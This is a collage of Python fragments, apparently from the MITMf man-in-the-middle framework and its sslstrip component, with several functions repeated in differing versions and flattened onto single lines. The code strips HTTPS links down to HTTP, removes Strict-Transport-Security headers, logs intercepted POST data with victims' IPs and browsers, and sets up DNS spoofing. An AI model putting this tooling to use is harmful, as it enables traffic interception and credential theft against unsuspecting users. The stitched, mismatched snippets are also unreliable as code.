def connectionMade(self): mitmf_logger.debug("[ServerConnection] HTTP connection made.") ProxyPlugins.getInstance().hook() self.sendRequest() self.sendHeaders() if (self.command == 'POST'): self.sendPostData()
def handleEndHeaders(self): if (self.isImageRequest and self.contentLength != None): self.client.setHeader("Content-Length", self.contentLength) if self.length == 0: self.shutdown() ProxyPlugins.getInstance().hook() if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG": for header, value in self.client.headers.iteritems(): mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
def getPluginStatus(plugin): # example: http://127.0.0.1:9090/cachekill for p in ProxyPlugins.getInstance().plist: if plugin == p.name: return json.dumps("1") return json.dumps("0")
def getPlugins(): # example: http://127.0.0.1:9090/ pdict = {} #print ProxyPlugins.getInstance().plist for activated_plugin in ProxyPlugins.getInstance().plist: pdict[activated_plugin.name] = True #print ProxyPlugins.getInstance().plist_all for plugin in ProxyPlugins.getInstance().plist_all: if plugin.name not in pdict: pdict[plugin.name] = False #print ProxyPlugins.getInstance().pmthds return json.dumps(pdict)
def getPluginStatus(plugin): # example: http://127.0.0.1:9090/cachekill for p in ProxyPlugins().plugin_list: if plugin == p.name: return json.dumps("1") return json.dumps("0")
def getPlugins(): # example: http://127.0.0.1:9999/ pdict = {} #print ProxyPlugins().plugin_list for activated_plugin in ProxyPlugins().plugin_list: pdict[activated_plugin.name] = True #print ProxyPlugins().all_plugins for plugin in ProxyPlugins().all_plugins: if plugin.name not in pdict: pdict[plugin.name] = False #print ProxyPlugins().pmthds return json.dumps(pdict)
def __init__(self, command, uri, postData, headers, client): self.command = command self.uri = uri self.postData = postData self.headers = headers self.client = client self.clientInfo = {} self.plugins = ProxyPlugins() self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().hsts self.app = URLMonitor.getInstance().app self.isImageRequest = False self.isCompressed = False self.contentLength = None self.shutdownComplete = False self.handle_post_output = False
def handleStatus(self, version, code, message): values = ProxyPlugins.getInstance().hook() version = values['version'] code = values['code'] message = values['message'] mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message)
def setPluginStatus(plugin, status): # example: http://127.0.0.1:9090/cachekill/1 # enabled # example: http://127.0.0.1:9090/cachekill/0 # disabled if status == "1": for p in ProxyPlugins().all_plugins: if (p.name == plugin) and (p not in ProxyPlugins().plugin_list): ProxyPlugins().addPlugin(p) return json.dumps({ "plugin": plugin, "response": "success" }) elif status == "0": for p in ProxyPlugins().plugin_list: if p.name == plugin: ProxyPlugins().removePlugin(p) return json.dumps({ "plugin": plugin, "response": "success" }) return json.dumps({"plugin": plugin, "response": "failed"})
def __init__(self, channel, queued, reactor=reactor): Request.__init__(self, channel, queued) self.reactor = reactor self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().isHstsBypass() self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() self.plugins = ProxyPlugins.getInstance() #self.uniqueId = random.randint(0, 10000) #Use are own DNS server instead of reactor.resolve() self.resolver = URLMonitor.getInstance().getResolver() self.customResolver = dns.resolver.Resolver() self.customResolver.nameservers = ['127.0.0.1'] self.customResolver.port = URLMonitor.getInstance().getResolverPort()
def __init__(self, command, uri, postData, headers, client): self.command = command self.uri = uri self.postData = postData self.headers = headers self.client = client self.clientInfo = None self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().isHstsBypass() self.app = URLMonitor.getInstance().isAppCachePoisoning() self.plugins = ProxyPlugins.getInstance() self.isImageRequest = False self.isCompressed = False self.contentLength = None self.shutdownComplete = False
def setPluginStatus(plugin, status): # example: http://127.0.0.1:9090/cachekill/1 # enabled # example: http://127.0.0.1:9090/cachekill/0 # disabled if status == "1": for p in ProxyPlugins.getInstance().plist_all: if (p.name == plugin) and (p not in ProxyPlugins.getInstance().plist): ProxyPlugins.getInstance().addPlugin(p) return json.dumps({"plugin": plugin, "response": "success"}) elif status == "0": for p in ProxyPlugins.getInstance().plist: if p.name == plugin: ProxyPlugins.getInstance().removePlugin(p) return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "failed"})
def handleResponse(self, data): if (self.isCompressed): mitmf_logger.debug("[ServerConnection] Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() data = self.replaceSecureLinks(data) data = ProxyPlugins.getInstance().hook()['data'] mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) if (self.contentLength != None): self.client.setHeader('Content-Length', len(data)) try: self.client.write(data) except: pass try: self.shutdown() except: mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
if getattr(args, p.optname): p.initialize(args) load.append(p) if vars(args)[p.optname] is True: if hasattr(p, 'tree_output') and p.tree_output: for line in p.tree_output: print "| |_ %s" % line except Exception, e: print "[-] Error loading plugin %s: %s" % (p.name, str(e)) #Plugins are ready to go, start MITMf if args.disproxy: ProxyPlugins.getInstance().setPlugins(load) else: from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor from libs.dnschef.dnschef import DNSChef URLMonitor.getInstance().setFaviconSpoofing(args.favicon) URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver']) URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port']) DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS']) if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on': DNSChef.getInstance().startTCP() else: DNSChef.getInstance().startUDP()
from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor URLMonitor.getInstance().setFaviconSpoofing(options.favicon) URLMonitor.getInstance().setCaching(options.preserve_cache) CookieCleaner.getInstance().setEnabled(options.killsessions) strippingFactory = http.HTTPFactory(timeout=10) strippingFactory.protocol = StrippingProxy reactor.listenTCP(options.listen_port, strippingFactory) ProxyPlugins().all_plugins = plugins print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) for plugin in plugins: #load only the plugins that have been called at the command line if vars(options)[plugin.optname] is True: ProxyPlugins().add_plugin(plugin) print "|_ {} v{}".format(plugin.name, plugin.version) if plugin.tree_info: for line in xrange(0, len(plugin.tree_info)): print "| |_ {}".format(plugin.tree_info.pop()) plugin.setup_logger()
def shutdown(message=None): for plugin in ProxyPlugins.getInstance().plist: plugin.finish() sys.exit(message)
class ServerConnection(HTTPClient): ''' The server connection is where we do the bulk of the stripping. Everything that comes back is examined. The headers we dont like are removed, and the links are stripped from HTTPS to HTTP. ''' urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) urlType = re.compile(r"https://", re.IGNORECASE) urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) urlTypewww = re.compile(r"https://www", re.IGNORECASE) urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) def __init__(self, command, uri, postData, headers, client): self.command = command self.uri = uri self.postData = postData self.headers = headers self.client = client self.clientInfo = {} self.plugins = ProxyPlugins() self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().hsts self.app = URLMonitor.getInstance().app self.isImageRequest = False self.isCompressed = False self.contentLength = None self.shutdownComplete = False self.handle_post_output = False def sendRequest(self): if self.command == 'GET': clientlog.info(self.headers['host'], extra=self.clientInfo) log.debug("Full request: {}{}".format(self.headers['host'], self.uri)) self.sendCommand(self.command, self.uri) def sendHeaders(self): for header, value in self.headers.iteritems(): log.debug("Sending header: ({}: {})".format(header, value)) self.sendHeader(header, value) self.endHeaders() def sendPostData(self): if self.handle_post_output is False: #So we can disable printing POST data coming from plugins try: postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging if len(postdata) > 0: clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo) except Exception as e: if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message: log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host'])) self.handle_post_output = False self.transport.write(self.postData) def connectionMade(self): log.debug("HTTP connection made.") try: user_agent = parse(self.headers['user-agent']) self.clientInfo["clientos"] = user_agent.os.family self.clientInfo["browser"] = user_agent.browser.family try: self.clientInfo["browserv"] = user_agent.browser.version[0] except IndexError: self.clientInfo["browserv"] = "Other" except KeyError: self.clientInfo["clientos"] = "Other" self.clientInfo["browser"] = "Other" self.clientInfo["browserv"] = "Other" self.clientInfo["clientip"] = self.client.getClientIP() self.plugins.hook() self.sendRequest() self.sendHeaders() if (self.command == 'POST'): self.sendPostData() def handleStatus(self, version, code, message): values = self.plugins.hook() version = values['version'] code = values['code'] message = values['message'] log.debug("Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): if (key.lower() == 'location'): value = self.replaceSecureLinks(value) if self.app: self.urlMonitor.addRedirection(self.client.uri, value) if (key.lower() == 'content-type'): if (value.find('image') != -1): self.isImageRequest = True log.debug("Response is image content, not scanning") if (key.lower() == 'content-encoding'): if (value.find('gzip') != -1): log.debug("Response is compressed") self.isCompressed = True elif (key.lower()== 'strict-transport-security'): clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo) elif (key.lower() == 'content-length'): self.contentLength = value elif (key.lower() == 'set-cookie'): self.client.responseHeaders.addRawHeader(key, value) else: self.client.setHeader(key, value) def handleEndHeaders(self): if (self.isImageRequest and self.contentLength != None): self.client.setHeader("Content-Length", self.contentLength) self.client.setHeader("Expires", "0") self.client.setHeader("Cache-Control", "No-Cache") if self.length == 0: self.shutdown() self.plugins.hook() if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG": for header, value in self.client.headers.iteritems(): log.debug("Receiving header: ({}: {})".format(header, value)) def handleResponsePart(self, data): if (self.isImageRequest): self.client.write(data) else: HTTPClient.handleResponsePart(self, data) def handleResponseEnd(self): if (self.isImageRequest): self.shutdown() else: #Gets rid of some generic errors try: HTTPClient.handleResponseEnd(self) except: pass def handleResponse(self, data): if (self.isCompressed): log.debug("Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() data = self.replaceSecureLinks(data) data = self.plugins.hook()['data'] #log.debug("Read from server {} bytes of data:\n{}".format(len(data), data)) log.debug("Read from server {} bytes of data".format(len(data))) if (self.contentLength != None): self.client.setHeader('Content-Length', len(data)) try: self.client.write(data) except: pass try: self.shutdown() except: log.info("Client connection dropped before request finished.") def replaceSecureLinks(self, data): if self.hsts: sustitucion = {} patchDict = self.urlMonitor.patchDict if patchDict: dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys())))) data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) iterator = re.finditer(ServerConnection.urlExpression, data) for match in iterator: url = match.group() log.debug("Found secure reference: " + url) nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url) log.debug("Replacing {} => {}".format(url,nuevaurl)) sustitucion[url] = nuevaurl if sustitucion: dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys())))) data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) return data else: iterator = re.finditer(ServerConnection.urlExpression, data) for match in iterator: url = match.group() log.debug("Found secure reference: " + url) url = url.replace('https://', 'http://', 1) url = url.replace('&', '&') self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url) data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) return re.sub(ServerConnection.urlType, 'http://', data) def shutdown(self): if not self.shutdownComplete: self.shutdownComplete = True try: self.client.finish() self.transport.loseConnection() except: pass
class ServerConnection(HTTPClient): ''' The server connection is where we do the bulk of the stripping. Everything that comes back is examined. The headers we dont like are removed, and the links are stripped from HTTPS to HTTP. ''' urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) urlType = re.compile(r"https://", re.IGNORECASE) urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) urlTypewww = re.compile(r"https://www", re.IGNORECASE) urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) def __init__(self, command, uri, postData, headers, client): self.command = command self.uri = uri self.postData = postData self.headers = headers self.client = client self.clientInfo = {} self.plugins = ProxyPlugins() self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().hsts self.app = URLMonitor.getInstance().app self.isImageRequest = False self.isCompressed = False self.contentLength = None self.shutdownComplete = False self.handle_post_output = False def sendRequest(self): if self.command == 'GET': clientlog.info(self.headers['host'], extra=self.clientInfo) log.debug("Full request: {}{}".format(self.headers['host'], self.uri)) self.sendCommand(self.command, self.uri) def sendHeaders(self): for header, value in self.headers.iteritems(): log.debug("Sending header: ({}: {})".format(header, value)) self.sendHeader(header, value) self.endHeaders() def sendPostData(self): if self.handle_post_output is False: #So we can disable printing POST data coming from plugins try: postdata = self.postData.decode( 'utf8' ) #Anything that we can't decode to utf-8 isn't worth logging if len(postdata) > 0: clientlog.warning("POST Data ({}):\n{}".format( self.headers['host'], postdata), extra=self.clientInfo) except Exception as e: if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message: log.debug("{} Ignored post data from {}".format( self.clientInfo['clientip'], self.headers['host'])) self.handle_post_output = False self.transport.write(self.postData) def connectionMade(self): log.debug("HTTP connection made.") try: user_agent = parse(self.headers['user-agent']) self.clientInfo["clientos"] = user_agent.os.family self.clientInfo["browser"] = user_agent.browser.family try: self.clientInfo["browserv"] = user_agent.browser.version[0] except IndexError: self.clientInfo["browserv"] = "Other" except KeyError: self.clientInfo["clientos"] = "Other" self.clientInfo["browser"] = "Other" self.clientInfo["browserv"] = "Other" self.clientInfo["clientip"] = self.client.getClientIP() self.plugins.hook() self.sendRequest() self.sendHeaders() if (self.command == 'POST'): self.sendPostData() def handleStatus(self, version, code, message): values = self.plugins.hook() version = values['version'] code = values['code'] message = values['message'] log.debug("Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): if (key.lower() == 'location'): value = self.replaceSecureLinks(value) if self.app: self.urlMonitor.addRedirection(self.client.uri, value) if (key.lower() == 'content-type'): if (value.find('image') != -1): self.isImageRequest = True log.debug("Response is image content, not scanning") if (key.lower() == 'content-encoding'): if (value.find('gzip') != -1): log.debug("Response is compressed") self.isCompressed = True elif (key.lower() == 'strict-transport-security'): clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo) elif (key.lower() == 'content-length'): self.contentLength = value elif (key.lower() == 'set-cookie'): self.client.responseHeaders.addRawHeader(key, value) else: self.client.setHeader(key, value) def handleEndHeaders(self): if (self.isImageRequest and self.contentLength != None): self.client.setHeader("Content-Length", self.contentLength) self.client.setHeader("Expires", "0") self.client.setHeader("Cache-Control", "No-Cache") if self.length == 0: self.shutdown() self.plugins.hook() if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG": for header, value in self.client.headers.iteritems(): log.debug("Receiving header: ({}: {})".format(header, value)) def handleResponsePart(self, data): if (self.isImageRequest): self.client.write(data) else: HTTPClient.handleResponsePart(self, data) def handleResponseEnd(self): if (self.isImageRequest): self.shutdown() else: #Gets rid of some generic errors try: HTTPClient.handleResponseEnd(self) except: pass def handleResponse(self, data): if (self.isCompressed): log.debug("Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() data = self.replaceSecureLinks(data) data = self.plugins.hook()['data'] #log.debug("Read from server {} bytes of data:\n{}".format(len(data), data)) log.debug("Read from server {} bytes of data".format(len(data))) if (self.contentLength != None): self.client.setHeader('Content-Length', len(data)) try: self.client.write(data) except: pass try: self.shutdown() except: log.info("Client connection dropped before request finished.") def replaceSecureLinks(self, data): if self.hsts: sustitucion = {} patchDict = self.urlMonitor.patchDict if patchDict: dregex = re.compile("({})".format("|".join( map(re.escape, patchDict.keys())))) data = dregex.sub( lambda x: str(patchDict[x.string[x.start():x.end()]]), data) iterator = re.finditer(ServerConnection.urlExpression, data) for match in iterator: url = match.group() log.debug("Found secure reference: " + url) nuevaurl = self.urlMonitor.addSecureLink( self.clientInfo['clientip'], url) log.debug("Replacing {} => {}".format(url, nuevaurl)) sustitucion[url] = nuevaurl if sustitucion: dregex = re.compile("({})".format("|".join( map(re.escape, sustitucion.keys())))) data = dregex.sub( lambda x: str(sustitucion[x.string[x.start():x.end()]]), data) return data else: iterator = re.finditer(ServerConnection.urlExpression, data) for match in iterator: url = match.group() log.debug("Found secure reference: " + url) url = url.replace('https://', 'http://', 1) url = url.replace('&', '&') self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url) data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) return re.sub(ServerConnection.urlType, 'http://', data) def shutdown(self): if not self.shutdownComplete: self.shutdownComplete = True try: self.client.finish() self.transport.loseConnection() except: pass
#load only the plugins that have been called at the command line if vars(args)[p.optname] is True: print "|_ {} v{}".format(p.name, p.version) if p.tree_info: for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) p.initialize(args) if p.tree_info: for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) ProxyPlugins.getInstance().addPlugin(p) #Plugins are ready to go, let's rock & roll from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor URLMonitor.getInstance().setFaviconSpoofing(args.favicon) CookieCleaner.getInstance().setEnabled(args.killsessions) strippingFactory = http.HTTPFactory(timeout=10) strippingFactory.protocol = StrippingProxy reactor.listenTCP(args.listen, strippingFactory) for p in ProxyPlugins.getInstance().plist:
def shutdown(message=None): for plugin in ProxyPlugins().plugin_list: plugin.on_shutdown() sys.exit(message)